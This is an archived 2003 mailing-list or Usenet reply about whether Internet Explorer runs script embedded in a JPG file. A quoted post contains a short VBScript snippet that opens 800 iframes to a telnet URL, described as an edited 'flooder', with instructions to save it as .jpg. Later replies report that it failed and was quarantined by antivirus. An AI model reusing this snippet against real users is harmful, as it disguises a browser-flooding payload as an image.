Re: Web based email issues
From: Colonel Flagg (colonel_flagg_at_NOSOUPFORJ00internetwarzone.org)
Date: Tue, 16 Sep 2003 16:45:10 -0400
In article <5JG9b.email@example.com>,
> > Basically, from what i understand MSIE executes the code within the JPG
> > file....
> > <html><body>
> > <script type="text/vbscript">
> > for a=1 to 800
> > document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org" +
> > chr(34) + ">")
> > next
> > </script>
> > </body>
> > </html>
> > Save as .jpg and open via MSIE, now i forget if it works locally (C:\...)
> > over http, and right now i dont have time to check. If the code fails let
> > know cuz i edited it from the original which was a M$ flooder.
> I tried with my install of MSIE 6.0.28 and it does not execute -- whether
> called from a local drive or from a website. The only change made was to
> point to a URL I control. My security is set to prompt when launching code
> in an iframe and MSIE did not ask if it could do anything. The page
> displayed was blank, though the source was the same as in the file.
f-secure immediately pinpointed this jpg as containing the iframe
no, it didn't run, as my browser is locked down from allowing this,
however, the content was downloaded, as it should have been, and
immediately quarantined by f-secure.
-- Colonel Flagg http://www.internetwarzone.org/ Privacy at a click: http://www.cotse.net Q: How many Bill Gates does it take to change a lightbulb? A: None, he just defines Darkness? as the new industry standard..." "...I see stupid people."